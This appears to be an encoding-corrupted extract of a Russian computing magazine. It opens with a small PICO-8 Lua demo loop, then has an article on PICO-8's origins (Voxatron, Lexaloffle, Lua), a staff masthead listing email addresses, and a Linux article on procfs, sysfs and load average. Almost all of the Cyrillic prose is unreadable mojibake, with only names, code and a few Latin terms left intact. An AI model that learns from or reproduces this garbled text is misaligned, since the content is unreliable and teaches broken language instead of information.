for i=1,16 do pal(i-1,sub("01289821",i/2,i/2),1)
end cls() ::q:: z=t()/3 y=64 x=64
for i=0,128,.05 do x+=cos(i/30+z*2)*i/128 y+=sin(i/30+z*2)*i/128 circ
(x,y,1,i*(1+sin(i/128+z)/2)*2) end flip() goto q
??????? PICO-8
???�?????� Pico?8� ?� ???�??� ????,� ?????�???� ???�?� ??� ????�?????� zep.� ??
?????�?� ?� ?????� ?????�??� ?� ?????� ????�???� ????� ?� ???�??.� ???�?� ???�?
????�???�?,� ???� ??????�?� Pico?8,� ??� ????�?� ??????�?� ???�???� ?� ????,� ???
?� ????�??� ??� ????�??�?� ????�????�???�???� ??� ?????�??�?� BBC� Micro,
???????�??�???�????�??�?????.
�???� ??????� ???�??�??� ?� ??????�??� ????�???� ???�???�?� ???�?????
?� ??????� ????�???� ??� ???�??�???� ???�????�?,� ??????,� ???� ??????�???�?
?�???�???�????�??�??�??�,��??�??�???�?�???.燘BC燤icro�??�?????�?
???�??�?,�???�?�??�???�??�???��??燘ASIC,�????�?�??�??�???�???�
????�???�??�??�????�???�???�??�????�???�????�??,�?????��???�??.
??�???�????�??�????�??�????�?�??�??��???�?????�??�??�?�??�?,
?�?�????�?�?????�????�??????��???.��04�???�???�??????�????�
?????燣ex500,�??????�???�?�?????�???�??�????燗miga500��???�??�?
?????�????�????�??�????燘ASIC.�????�??�??????�????�?????��??�????�
???�??�????,�?�?????�?��10�???�????�?�??�??燰oxatron.�??�??????�
???�??� ??� YouTube� ???�???� ?????�??� ??????,� ?� ???�??� ????� ????�??� ???
???�???� ????� ????,� ???�?� ???�?????�???�?� ??� Voxatron.� ???�????�?� ??� ????�
???�?????�??�????�?�??�????�????�??.
????�?????�???,� ???� Voxatron� ?????� ??� ????�?� ?????,� ?� ?????�????,
?�??????�??�??�??�??�?????�???�???��?????�???�??�??.�????????�
??�??????�?????,�???�??�????�???????�????�???�??�???�???.�??�?
???�???�?????�???��燩ico?8.
????�???�?燩ico?8�????�?�??�????�?�??�???�????�????�??�??燰oxatron
??�???�?燣ex500.�????�??�????�???�?????�?????燩ico�??�??�???�????�
?????� ???????� ???�???�??� ????.� ????�?� ???� ?� ???� ??????�?� ????� ?????
?????�????�????�??��?????.�???�?,�??�??????�8�?�8�???�???�??�?
�??�?粻???�???�?�???�?燰oxatron.
???�??�????�??�???:燩ico?8�??�??��????燩ico燩ico燙afe��?????�??,
???????� ???�??� ?� ???� ????� ??????� ????� ?????�?� ?� ?????.� ???�??� ????
??� ???�????�???�???� ???�?� ???�??� ???� ?????�?� ??????�????� ???�????�????
?� ???�?� Lexalo?e� ?� ???�?� ???�?,� ???????� ????�??� ?????� ???�???� ????�?
???�????�?�????�?�??�??.
玃ico?8� ????� ??????�??�?????� ???�??�??� ???�????�???� Voxatron�,� ?
?????� ????.� ???�?????� ????�??,� ???????� ????�????� Pico� ?� ?????�?????
????�????,�???�????�??�????�??�?燣ua.��??�??�??�???燘ASIC�???�???�
?????�?�燣ua��????�????�?�?�??�????�??�?????,�?�??�?�???�????
??�???�???�???�?�??�?��???�???�???�?燣ua.
�????�??,�???�?�??�???�??�?,�???�?���?????�?????�???�??
????,�????�??�??�???�????�?????�??�???.�???�?�??�?��??�????�?
?????� ???� ???�???�????� ????� ?� ????� ?????� ?????,� ???� ??,� ???� ?� ?????,� ?
???�?????�??�?�???�????�,��??�??�???�?�???.
???�????�?� ???�?????�?????�???� ?� ??????�??� ?????� ??????�?� ???�???�
???.� ???????,� ????�??� ????� ?????� ???�???�???� ?� ???,� ???� ????�???�??� ?????�
?????� ????�????� ???�??� ??� ??,� ??????� ???????�?� ????.� �??�?� ???� ??,
???�???�??�??�??�????�??�??�??�?�???�????�??�???�??�??��?????
????�????�??� ???�????,� ?� ???�????�?� ????,� ?� ????�????� ?????� ????
?????�??�????�????�?��???�?????�??�??�????�??,�??�?????�?�??�.
?�?????�???�??�??�?�??????�?????�??�???�??�?�燩ico?8燜anzine
????
???�???燩ico?8��???�?�???�??�??�??�??�??�??�????�?.�??�???�???�
????�?�??�??�??�??�?????��????�???��??�????�?�???�???�?�?????
??�???�???�??.��????�??????�??��??????�?????�??燩ico?8�??�????�
???�??�??�(game爅ams),�??�??�??�?�??�????�???�??,�??燣udum燚are.
WWW
????�????�??�???
?API
?????�??�??�????�???燩ico?8
???�??��??�???�?
?Tweet燡am
?03�(228)
�
????�??????
????�??�????�??
rusanen@glc.ru
????�??�???�??
?????�?????�????�??
glazkov@glc.ru
�
??�???�???�??�??
?????????�??
pismenny@glc.ru
??�????�?????�?
??????�??�??�????�??
??�??�???�??�??
??�???�???�??�??
pismenny@glc.ru
aLLy
iam@russiansecurity.expert
�
�
????�??????
rusanen@glc.ru
??�????�??�??
zobnin@glc.ru
�
�
????�????牜Dr.粻
?????????
lozovsky@glc.ru
??�??牜ant粻?????
zhukov@glc.ru
MEGANEWS
??�??�?????�?
nefedova.maria@gameland.ru
???
yambuto
yambuto@gmail.com
???�???
??�?�???�???�
??�??�??�?�???�??�????�
yakovleva.a@glc.ru
???�??????�????��??�????
???�???�?�??�????:爈apina@glc.ru�
� ??�???�?�?????�???:爏upport@glc.ru�
?
??�??�????�??:�5080,�????�??�??,�?????�??�???�??�?,�??��???�???��???��?????�??營X,�??�???�,�???��???�???:�?
????�???�????�??�????,�0046,�??�?????�???�??????,�.�??�?????,�?.�???�?�??????,�.�.�???�?????:�??牜?????�??粻� �5080,
?????�??�??,�?????�??�???�??�?,�??��???�???��???��?????�??營X,�??�???�,�???��??????�??�???�?��???????�??�???�?
??�??�???��??�?�??�?,�??????�???�??�??�??????��??�????�??�?????�??�(???�?????�???),�??�?????�???牋??�牋??77?�001�?牋30.�
08.�16� ????.� ???�??� ?????�??� ??� ???�?????�?� ???�???�?� ?� ???�???� ????�??.� ???� ??????�??� ?� ??????� ???�??�????�???� ???� ???????�??
?� ???�????�??.� ????,� ??????�?????� ???�??� ???????�??� ?� ???�???�????�??� ?????,� ?????� ????� ????�?????� ?� ??????�???�????.� ?????�??
??�????�?????�???�????�?�????�????�??�?????�??�???�??��?????.�?�??�????�????�?????�??��?????�??�???�?�?????�??????
?????�???�??�?????�???�??�???�???�??�???�?�???�?:爔akep@glc.ru.牘�??�??牜?????�,�?,�18
?????�?��??�??�???,�???�???�
????�?燣inux�??�???�?�?�???�?�??�??�?��??�???燫UNNING,�?��??�???�
??,� ??????�????� ?� UNINTERRUPTIBLE_SLEEP,� ??� ????� ???????� ??� ???????
?�???.�??�??�??,�??�?�??�??�?�????�??�?�??�?????�??�???營/O?????�
?????,�?��?????�?�???�?�??,�?????�??�?????��???�?�???�???�????�
??營/O.�??????,��????�???�??�???,��?�??�?????�???�??????�??�????�
????????� ???� ?� ???� ???� ??????:� �??� ???�???�?� Load� Average�,� 獿oad� Average
?燣inux:�??�????�??�?�.
?????, ??????? ???
??�?�???????�??�??�????�??�?,�燣inux�???????�??????�??�??????�??
???� ?� ???�??�??,� ???� ?� ?� ??????� ???�??� ????�?� ???�????� ???�????�??� ????�
?????� ???�???� procfs� (/proc),� ?� ???�?� sysfs� (/sys).� ?� ?� ???� ??????�?
???????��???�??�??�???�??.
??�?��??,�??�???�?�??�????�??�?????�??�??�??�??燯NIX�??�??:
�??�???�???�,�?�???�??�??�??�????��????�??�?????�??�????�??
?????�????�?� ???�??� ???�???� ?????� ?????�??� ???� ???�????�??� ????,� ????�
??????�????�???�??�?????�?????�??.�??�???�?�???�???�?????��???�
?????�?燯NIX�??�??�???�?燩lan��??�??�??�??�?�???�???????��??????�
??� ?� ???�??�??�???�???� ?� ????� ???�?� ????� ????� ???�???�???� ??????� cat
?� ls,� ???�???�?� ???� ????� ???�??�???.� ????�?� ???� ?????�???� ???�????� ????�
????爌rocfs,�??????�??�?�?????�???�?�燣inux�燘SD.
??,�??���??�??�爈oad燼verage,�??�???�?�燣inux�???�???�??�????�(???
?�??�????�?????�??�??????�?????�??????????).�??�????,�????�????
/proc,�??�???�??�????,��?????�?????�??�??�??�???�??�???????�??
??????�??� ???????�??� ??� ????� ?� ?????,� ?� ??� ????�?� ??� ???�??�??.� ?????
????,�???�?�??�??�??�???�???��??�??�???�????�??�??�???�???�?????�
??�?�?????�???,�???�?�????�???�??????�??�?�?燩ID???.
?� ??????�?� ???�???� ?� /proc� ????�?????� ???� ????�?� ?� ????�?� ???�??,
?????�????�??????�??��????�??�??�??�????�??�???,�?????��???�
???� ???�??.� ?� ?????�??� ???�?� ??� ????�????�?� ?� ?????�?,� ?� ???�????�???
??????� ?????�?� ???????�??� ????� ??� ?� ??????� ?� ??????�??� ???�????� ????�
????,� ???????� ?� ????� ??� ???�?� ????� ??� ??????�?????� ???� ???�?????�??
??????�?� /dev.� ???� ?� ?????�???� /sys� ??� ???�?� ?????�??� ?????�????� ???????�
???��?�???�?�??�??�???�???�??,�?�??�????�???�?�??�???�???�???�
????�??�???�??�???�??�???�????�(??????�??爑dev,�??????��??�???�?
?????�????�?????�?�/dev�?�???�?�??????�??�?�/sys).
?� ???�?� ????� ???????�??� ??� ???� ???� ???�???�???� ?� /proc� ?� /sys� ????�?
??????,� ???,� ????� ????????� ???�?� ??� /proc,� ???�?� ???�???� ??????�??� ????�
?????�???�??� ???�?????� ???�????�?� (??????!),� ???????� ??� ???� ???
??�?????�???.
??��??�???� /run,�????�?�?.�??�??�????�??�???,�??????�??�????�
????� ?????� ??� ???�??� ?� ???�??� ??????�??�??� ???�???� ???� ???�??� ???�??�?
????????�??�?????�??????,��??�???�?爑dev�爏ystemd�(?�??�?????�??
??????�?� ????� ???�?).� ????�?,� ???� ???�??� udev� ?� 2012� ????� ????�?� ?� systemd
?�???�?�??�???�???�??�??�????.
?�????,�??�????�????�??�???,牜???�?????�??��?????�??�.
??��??�??�?�???????:燩rocfs燼nd爏ysfs�牜???�????�??�???�/proc�.
??� ???�????� ?� ?????� ???????.� ???� ????� ???�?� ????�???,� ?????� PID� ?????�
?????� ???�??�??,� ????� ?????�?� pidstat� ?� htop� (??� ????�???�???� ??????,
?????�???�??????�??�??爐op,�???�?�?????�???�??�???�???�?�??�?,�???�
???�??�????�???�??�????�?�????).
???�?�???,�????�?爐ime�??�???�?�????�???�??�???,�????�?�???�??
???�?�??�?????
Author
barmaley